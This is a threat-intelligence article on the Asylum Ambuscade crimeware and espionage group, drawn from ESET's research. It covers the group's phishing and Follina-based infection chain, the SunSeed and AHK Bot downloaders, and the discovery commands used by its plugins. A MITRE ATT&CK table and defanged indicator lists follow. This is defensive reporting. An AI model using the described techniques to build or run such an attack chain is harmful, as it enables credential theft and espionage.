The rise of Asylum Ambuscade: from phishing campaigns to global cybercrime wave
The threat actor known as Asylum Ambuscade has been observed straddling cybercrime and cyber espionage operations since at least early 2020. In a recent analysis by ESET, it was revealed that Asylum Ambuscade is a crimeware group targeting bank customers and cryptocurrency traders in various regions, including North America and Europe. However, the group is also involved in espionage against government entities in Europe and Central Asia.
Asylum Ambuscade first came to light in March 2022 when Proofpoint documented its nation-state-sponsored phishing campaign targeting European governmental entities to obtain intelligence on refugee and supply movement. The primary objective of the attackers is to extract confidential information and web email credentials from official government email portals.
The attacks initiated by Asylum Ambuscade typically start with a spear-phishing email containing a malicious Excel spreadsheet attachment. Once opened, the attachment either exploits VBA code or the Follina vulnerability (CVE-2022-30190) to download an MSI package from a remote server.
The MSI installer deploys a downloader written in Lua called SunSeed, which retrieves an AutoHotkey-based malware known as AHK Bot from another remote server. This multi-stage approach allows the attackers to maintain persistence and evade detection.
Notably, Asylum Ambuscade has also been engaged in cybercrime activities, targeting over 4,500 victims worldwide since January 2022. The majority of these victims are located in North America, Asia, Africa, Europe, and South America. The group targets individuals, cryptocurrency traders, and small to medium-sized businesses (SMBs) in various sectors.
ESET researcher Matthieu Faou believes that while one aspect of the attacks is focused on stealing cryptocurrency, the targeting of SMBs is likely aimed at monetizing the access by selling it to other cybercriminal groups.
The compromise chain follows a similar pattern, with the initial intrusion vector being a rogue Google Ad or a traffic direction system (TDS) that redirects potential victims to a malicious website delivering a JavaScript file containing malware. As part of their arsenal, Asylum Ambuscade has also utilized a Node.js version of AHK Bot called NODEBOT. This variant is responsible for downloading plugins that enable the group to capture screenshots, harvest passwords, gather system information, and install additional trojans and stealers.
The similarities observed in the attack chains employed by Asylum Ambuscade in both cybercrime and espionage activities suggest that the group is primarily a cybercrime organization with some involvement in cyber espionage.
There is an additional activity cluster known as Screentime, tracked by Proofpoint under the name TA866, which targets companies in the U.S. and Germany with tailored malware to steal sensitive information. These overlaps further underline the group’s diverse operations.
“It is quite unusual to catch a cybercrime group running dedicated cyberespionage operations,” Faou said. Asylum Ambuscade’s dual-threat activities make it a notable rarity in the ever-evolving threat landscape.
MITRE ATT&CK techniques
Tactic | ID | Name | Description |
---|---|---|---|
Resource Development | T1583.003 | Acquire Infrastructure: Virtual Private Server | Asylum Ambuscade rented VPS servers. |
T1587.001 | Develop Capabilities: Malware | Asylum Ambuscade develops custom implants in various scripting languages. | |
Initial Access | T1189 | Drive-by Compromise | Targets were redirected via a TDS to a website delivering a malicious JavaScript file. |
T1566.001 | Phishing: Spearphishing Attachment | Targets receive malicious Excel or Word documents. | |
Execution | T1059.005 | Command and Scripting Interpreter: Visual Basic | Asylum Ambuscade has a downloader in VBS. |
T1059.006 | Command and Scripting Interpreter: Python | Asylum Ambuscade has a screenshotter in Python. | |
T1059.007 | Command and Scripting Interpreter: JavaScript | Asylum Ambuscade has a downloader in JavaScript (NODEBOT). | |
T1059 | Command and Scripting Interpreter | Asylum Ambuscade has downloaders in other scripting languages such as Lua, AutoHotkey, or Tcl. | |
T1204.002 | User Execution: Malicious File | Targets needs to manually execute the malicious document or JavaScript file. | |
Persistence | T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | SunSeed persists via a LNK file in the startup folder. |
Defense Evasion | T1027.010 | Obfuscated Files or Information: Command Obfuscation | Downloaded JavaScript files are obfuscated with junk code. |
Credential Access | T1555.003 | Credentials from Password Stores: Credentials from Web Browsers | AHKBOT passwords plugin can steal browser credentials. |
Discovery | T1087.002 | Account Discovery: Domain Account | AHKBOT domain plugin gathers information about the domain using net group. |
T1010 | Application Window Discovery | AHKBOT wndlist plugin lists the active windows. | |
T1482 | Domain Trust Discovery | AHKBOT domain plugin gathers information using nltest. | |
T1057 | Process Discovery | AHKBOT tasklist plugin lists the active processes using Select * from Win32_Process. | |
T1518.001 | Software Discovery: Security Software Discovery | AHKBOT hardware plugin lists security software using Select * from FirewallProduct, Select * from AntiSpywareProduct and Select * from AntiVirusProduct. | |
T1082 | System Information Discovery | AHKBOT wndlist plugin gets system information using systeminfo. | |
T1016 | System Network Configuration Discovery | AHKBOT wndlist plugin gets network configuration information using ipconfig /all. | |
Collection | T1056.001 | Input Capture: Keylogging | AHKBOT keylogon records keystrokes. |
T1115 | Clipboard Data | AHKBOT keylogon monitors the clipboard. | |
T1113 | Screen Capture | AHKBOT deskscreen takes screenshot. | |
Command and Control | T1071.001 | Application Layer Protocol: Web Protocols | AHKBOT (and all the other downloaders) communicates with the C&C server via HTTP. |
Exfiltration | T1041 | Exfiltration Over C2 Channel | Data is exfiltrated via the C&C channel. |
Indicators of Compromise
SHA-1/IP |
---|
2B42FD41A1C8AC12221857DD2DF93164A71B95D7 |
D5F8ACAD643EE8E1D33D184DAEA0C8EA8E7FD6F8 |
57157C5D3C1BB3EB3E86B24B1F4240C867A5E94F |
7DB446B95D5198330B2B25E4BA6429C57942CFC9 |
5F67279C195F5E8A35A24CBEA76E25BAD6AB6E8E |
C98061592DE61E34DA280AB179465580947890DE |
519E388182DE055902C656B2D95CCF265A96CEAB |
AC3AFD14AD1AEA9E77A84C84022B4022DF1FC88B |
64F5AC9F0C6C12F2A48A1CB941847B0662734FBF |
557C5150A44F607EC4E7F4D0C0ED8EE6E9D12ADF |
F85B82805C6204F34DB0858E2F04DA9F620A0277 |
5492061DE582E71B2A5DA046536D4150F6F497F1 |
C554100C15ED3617EBFAAB00C983CED5FEC5DB11 |
AD8143DE4FC609608D8925478FD8EA3CD9A37C5D |
F2948C27F044FC6FB4849332657801F78C0F7D5E |
7AA23E871E796F89C465537E6ECE962412CDA636 |
384961E19624437EB4EB22B1BF45953D7147FB8F |
7FDB9A73B3F13DBD94D392132D896A5328DACA59 |
3E38D54CC55A48A3377A7E6A0800B09F2E281978 |
7F8742778FC848A6FBCFFEC9011B477402544171 |
29604997030752919EA42B6D6CEE8D3AE28F527E |
7A78AF75841C2A8D8A5929C214F08EB92739E9CB |
441369397D0F8DB755282739A05CB4CF52113C40 |
117ECFA95BE19D5CF135A27AED786C98EC8CE50B |
D24A9C8A57C08D668F7D4A5B96FB7B5BA89D74C3 |
95EDC096000C5B8DA7C8F93867F736928EA32575 |
62FA77DAEF21772D599F2DC17DBBA0906B51F2D9 |
A9E3ACFE029E3A80372C0BB6B7C500531D09EDBE |
EE1CFEDD75CBA9028904C759740725E855AA46B5 |
5.39.222[.]150 |
5.44.42[.]27 |
5.230.68[.]137 |
5.230.71[.]166 |
5.230.72[.]38 |
5.230.72[.]148 |
5.230.73[.]57 |
5.230.73[.]63 |
5.230.73[.]241 |
5.230.73[.]247 |
5.230.73[.]248 |
5.230.73[.]250 |
5.252.118[.]132 |
5.252.118[.]204 |
5.255.88[.]222 |
23.106.123[.]119 |
31.192.105[.]28 |
45.76.211[.]131 |
45.77.185[.]151 |
45.132.1[.]238 |
45.147.229[.]20 |
46.17.98[.]190 |
46.151.24[.]197 |
46.151.24[.]226 |
46.151.25[.]15 |
46.151.25[.]49 |
46.151.28[.]18 |
51.83.182[.]153 |
51.83.189[.]185 |
62.84.99[.]195 |
62.204.41[.]171 |
77.83.197[.]138 |
79.137.196[.]121 |
79.137.197[.]187 |
80.66.88[.]155 |
84.32.188[.]29 |
84.32.188[.]96 |
85.192.49[.]106 |
85.192.63[.]13 |
85.192.63[.]126 |
85.239.60[.]40 |
88.210.10[.]62 |
89.41.182[.]94 |
89.107.10[.]7 |
89.208.105[.]255 |
91.245.253[.]112 |
94.103.83[.]46 |
94.140.114[.]133 |
94.140.114[.]230 |
94.140.115[.]44 |
94.232.41[.]96 |
94.232.41[.]108 |
94.232.43[.]214 |
98.142.251[.]26 |
98.142.251[.]226 |
104.234.118[.]163 |
104.248.149[.]122 |
109.107.173[.]72 |
116.203.252[.]67 |
128.199.82[.]141 |
139.162.116[.]148 |
141.105.64[.]121 |
146.0.77[.]15 |
146.70.79[.]117 |
157.254.194[.]225 |
157.254.194[.]238 |
172.64.80[.]1 |
172.86.75[.]49 |
172.104.94[.]104 |
172.105.235[.]94 |
172.105.253[.]139 |
176.124.214[.]229 |
176.124.217[.]20 |
185.70.184[.]44 |
185.82.126[.]133 |
185.123.53[.]49 |
185.150.117[.]122 |
185.163.45[.]221 |
193.109.69[.]52 |
193.142.59[.]152 |
193.142.59[.]169 |
194.180.174[.]51 |
195.2.81[.]70 |
195.133.196[.]230 |
212.113.106[.]27 |
212.113.116[.]147 |
212.118.43[.]231 |
213.109.192[.]230 |